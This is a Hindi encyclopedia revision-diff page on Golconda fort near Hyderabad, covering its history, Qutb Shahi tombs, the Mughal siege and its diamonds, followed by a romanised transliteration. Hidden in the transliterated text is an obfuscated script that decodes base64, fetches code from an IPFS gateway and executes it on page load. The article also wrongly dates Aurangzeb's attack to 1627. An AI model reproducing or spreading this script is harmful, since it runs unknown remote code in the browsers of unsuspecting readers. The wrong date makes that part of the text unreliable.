Difference between revisions of "गोलकुंडा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खाँ" to "ख़ाँ")
Line 13: Line 13:
 
*मुहम्मद कुतुब और  
 
*मुहम्मद कुतुब और  
 
*अब्दुल्ला कुतुबशाह।  
 
*अब्दुल्ला कुतुबशाह।  
प्रेमावती व हयात बख्शी बेगमों के मक़्बरे भी इसी उद्यान के अन्दर हैं। इन मक़्बरों के आधार वर्गाकार हैं तथा इन पर गुंबदों की छतें हैं। चारों ओर वीथीकाएँ बनी हैं जिनके महाराब नुकीले हैं। ये वीथीकाएँ कई स्थानों पर दुमंजिली भी हैं। मक़्बरों के हिंदू वास्तुकला के विशिष्ट चिह्न कमल पुष्प तथा पत्र और कलियाँ, श्रंखलाएँ, प्रक्षिप्त छज्जे, स्वस्तिकाकार स्तंभशीर्ष आदि बने हुए हैं। गोलकुंडा दुर्ग के मुख्य प्रवेश द्वार में यदि जोर से करतल ध्वनि की जाए तो उसकी गूंज दुर्ग के सर्वोच्च भवन या कक्ष में पहुँचती है। एक प्रकार से यह ध्वनि आह्वान घंटी के समान थी। दुर्ग से डेढ़ मील पर तारामती की छतरी है। यह एक पहाड़ी पर स्थित है। देखने में यह वर्गाकार है और इसकी दो मंजिलें हैं। किंवदंती है कि तारामती, जो कुतुबशाही सुल्तानों की प्रेयसी तथा प्रसिद्ध नर्तकी थी, क़िले तथा छतरी के बीच बंधी  हुई एक रस्सी पर चाँदनी में नृत्य करती थी। सड़क के दूसरी ओर प्रेमावती की छतरी है। यह भी कुतुबशाही नरेशों की प्रेमपात्री थी। हिमायत सागर सरोवर के पास ही प्रथम निज़ाम के पितामह चिनकिलिचखाँ का मक़्बरा है।
+
प्रेमावती व हयात बख्शी बेगमों के मक़्बरे भी इसी उद्यान के अन्दर हैं। इन मक़्बरों के आधार वर्गाकार हैं तथा इन पर गुंबदों की छतें हैं। चारों ओर वीथीकाएँ बनी हैं जिनके महाराब नुकीले हैं। ये वीथीकाएँ कई स्थानों पर दुमंजिली भी हैं। मक़्बरों के हिंदू वास्तुकला के विशिष्ट चिह्न कमल पुष्प तथा पत्र और कलियाँ, श्रंखलाएँ, प्रक्षिप्त छज्जे, स्वस्तिकाकार स्तंभशीर्ष आदि बने हुए हैं। गोलकुंडा दुर्ग के मुख्य प्रवेश द्वार में यदि जोर से करतल ध्वनि की जाए तो उसकी गूंज दुर्ग के सर्वोच्च भवन या कक्ष में पहुँचती है। एक प्रकार से यह ध्वनि आह्वान घंटी के समान थी। दुर्ग से डेढ़ मील पर तारामती की छतरी है। यह एक पहाड़ी पर स्थित है। देखने में यह वर्गाकार है और इसकी दो मंजिलें हैं। किंवदंती है कि तारामती, जो कुतुबशाही सुल्तानों की प्रेयसी तथा प्रसिद्ध नर्तकी थी, क़िले तथा छतरी के बीच बंधी  हुई एक रस्सी पर चाँदनी में नृत्य करती थी। सड़क के दूसरी ओर प्रेमावती की छतरी है। यह भी कुतुबशाही नरेशों की प्रेमपात्री थी। हिमायत सागर सरोवर के पास ही प्रथम निज़ाम के पितामह चिनकिलिचख़ाँ का मक़्बरा है।
 
==आक्रमण==
 
==आक्रमण==
 
[[चित्र:Golkunda-Fort-Hyderabad-2.jpg|गोलकुंडा किला, [[हैदराबाद]]<br /> Golkonda Fort, Hyderabad|thumb]]
 
[[चित्र:Golkunda-Fort-Hyderabad-2.jpg|गोलकुंडा किला, [[हैदराबाद]]<br /> Golkonda Fort, Hyderabad|thumb]]
28 जनवरी, 1627 ई॰ को [[औरंगज़ेब]] ने गोलकुंडा के क़िले पर आक्रमण किया और तभी मुग़ल सेना के एक नायक के रूप में किलिच खाँ ने भी इस आक्रमण में भाग लिया था। युद्ध में इसका एक हाथ तोप के गोले से उड़ गया था जो मक़्बरे से आधा मील दूर किस्मतपुर में गड़ा हुआ है। इसी घाव से इसका कुछ दिन बाद निधन हो गया। कहा जाता है कि मरते वक़्त भी किलिच खाँ जरा भी विचलित नहीं हुआ था और औरंगज़ेब के प्रधानमंत्री जमदातुल मुल्क असद ने, जो उससे मिलने आया था, उसे चुपचाप काफ़ी पीते देखा था। [[शिवाजी]] ने [[बीजापुर]] और गोलकुंडा के सुल्तानों को बहुत संत्रस्त किया था तथा उनके अनेक किलों को जीत लिया था। उनका आतंक बीजापुर और गोलकुंडा पर बहुत समय तक छाया रहा जिसका वर्णन हिंदी के प्रसिद्ध कवि भूषण ने किया है- '''बीजापुर गोलकुंडा आगरा दिल्ली कोट बाजे बाजे रोज दरवाजे उधरत हैं'''।
+
28 जनवरी, 1627 ई॰ को [[औरंगज़ेब]] ने गोलकुंडा के क़िले पर आक्रमण किया और तभी मुग़ल सेना के एक नायक के रूप में किलिच ख़ाँ ने भी इस आक्रमण में भाग लिया था। युद्ध में इसका एक हाथ तोप के गोले से उड़ गया था जो मक़्बरे से आधा मील दूर किस्मतपुर में गड़ा हुआ है। इसी घाव से इसका कुछ दिन बाद निधन हो गया। कहा जाता है कि मरते वक़्त भी किलिच ख़ाँ जरा भी विचलित नहीं हुआ था और औरंगज़ेब के प्रधानमंत्री जमदातुल मुल्क असद ने, जो उससे मिलने आया था, उसे चुपचाप काफ़ी पीते देखा था। [[शिवाजी]] ने [[बीजापुर]] और गोलकुंडा के सुल्तानों को बहुत संत्रस्त किया था तथा उनके अनेक किलों को जीत लिया था। उनका आतंक बीजापुर और गोलकुंडा पर बहुत समय तक छाया रहा जिसका वर्णन हिंदी के प्रसिद्ध कवि भूषण ने किया है- '''बीजापुर गोलकुंडा आगरा दिल्ली कोट बाजे बाजे रोज दरवाजे उधरत हैं'''।
 
==प्रसिद्धि==
 
==प्रसिद्धि==
 
गोलकुंडा पहले हीरों के लिए विख्यात था। जिनमें से [[कोहिनूर हीरा]] सबसे मशहूर है।
 
गोलकुंडा पहले हीरों के लिए विख्यात था। जिनमें से [[कोहिनूर हीरा]] सबसे मशहूर है।

Revision as of 10:26, 30 May 2010

[[chitr:Golkunda-Fort-Hyderabad-1.jpg|golakuanda kila, haidarabad
Golkonda Fort, Hyderabad|thumb]] golakuanda ek qila v bhagnashesh nagar hai. yah aandhr pradesh ka ek nagar hai. haidarabad se paanch mil pashchim ki or bahamani vansh ke sultanoan ki rajadhani golakuanda ke vistrit khandahar sthit haian. golakuanda ka prachin durg varangal ke hiandoo rajaoan ne banavaya tha. ye devagiri ke yadav tatha varangal ke kakatiy nerashoan ke adhikar mean raha tha. in rajyavanshoan ke shasan ke chihn tatha kee khandit abhilekh durg ki divaroan tatha dvaroan par aankit milate haian. 1364 ee॰ mean varangal naresh ne is qile ko bahamani sultan mahamood shah ke havale kar diya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

itihas

itihasakar pharishta likhata hai ki bahamani vansh ki avanati ke pashchat 1511 ee॰ mean golakuanda ke pratham sultan ne apana svatantr rajy sthapit kar liya tha. kiantu qile ke andar sthit jama masajid ke ek pharasi abhilekh se jnat hota hai ki 1518 ee॰ mean bhi golakuanda ka sansthapak sultan kulokutub, mahamood shah bahamani ka samant tha.

paryatan

golakuanda ka kila 400 phut ooanchi kanashm (grenait) ki paha di par sthit hai. isake tin parakote haian aur isaka parimap sat mil ke lagabhag hai. is par 87 burj bane haian. durg ke andar kutubashahi begamoan ke bhavan ullekhaniy hai. inamean taramati, pemamati, hayat bakhshi begam aur bhagamati (jo haidarabad ya bhaganagar ke sansthapak kuli kutub shah ki preyasi thi) ke mahaloan se anek madhur akhyayiki ka sanbandh bataya jata hai. qile ke andar naumahalla namak any imaratean haian. jinhean haidarabad ke nijamoan ne banavaya tha. inaki manohari batikaean tatha sundar jalashay inake sauandary ko dvigunit kar dete haian. qile se tin phalaang par ibrahim bag mean sat kutubashahi sultanoan ke maqbare haian. jinake nam haian-

  • kuli kutub,
  • subhan kutub,
  • jamashedakuli,
  • ibrahim,
  • muhammad kulikutub,
  • muhammad kutub aur
  • abdulla kutubashah.

premavati v hayat bakhshi begamoan ke maqbare bhi isi udyan ke andar haian. in maqbaroan ke adhar vargakar haian tatha in par guanbadoan ki chhatean haian. charoan or vithikaean bani haian jinake maharab nukile haian. ye vithikaean kee sthanoan par dumanjili bhi haian. maqbaroan ke hiandoo vastukala ke vishisht chihn kamal pushp tatha patr aur kaliyaan, shrankhalaean, prakshipt chhajje, svastikakar stanbhashirsh adi bane hue haian. golakuanda durg ke mukhy pravesh dvar mean yadi jor se karatal dhvani ki jae to usaki gooanj durg ke sarvochch bhavan ya kaksh mean pahuanchati hai. ek prakar se yah dhvani ahvan ghanti ke saman thi. durg se dedh mil par taramati ki chhatari hai. yah ek paha di par sthit hai. dekhane mean yah vargakar hai aur isaki do manjilean haian. kianvadanti hai ki taramati, jo kutubashahi sultanoan ki preyasi tatha prasiddh nartaki thi, qile tatha chhatari ke bich bandhi huee ek rassi par chaandani mean nrity karati thi. s dak ke doosari or premavati ki chhatari hai. yah bhi kutubashahi nareshoan ki premapatri thi. himayat sagar sarovar ke pas hi pratham nizam ke pitamah chinakilichakhaan ka maqbara hai.

akraman

[[chitr:Golkunda-Fort-Hyderabad-2.jpg|golakuanda kila, haidarabad
Golkonda Fort, Hyderabad|thumb]] 28 janavari, 1627 ee॰ ko aurangazeb ne golakuanda ke qile par akraman kiya aur tabhi mugal sena ke ek nayak ke roop mean kilich khaan ne bhi is akraman mean bhag liya tha. yuddh mean isaka ek hath top ke gole se u d gaya tha jo maqbare se adha mil door kismatapur mean g da hua hai. isi ghav se isaka kuchh din bad nidhan ho gaya. kaha jata hai ki marate vaqt bhi kilich khaan jara bhi vichalit nahian hua tha aur aurangazeb ke pradhanamantri jamadatul mulk asad ne, jo usase milane aya tha, use chupachap kafi pite dekha tha. shivaji ne bijapur aur golakuanda ke sultanoan ko bahut santrast kiya tha tatha unake anek kiloan ko jit liya tha. unaka atank bijapur aur golakuanda par bahut samay tak chhaya raha jisaka varnan hiandi ke prasiddh kavi bhooshan ne kiya hai- bijapur golakuanda agara dilli kot baje baje roj daravaje udharat haian.

prasiddhi

golakuanda pahale hiroan ke lie vikhyat tha. jinamean se kohinoor hira sabase mashahoor hai.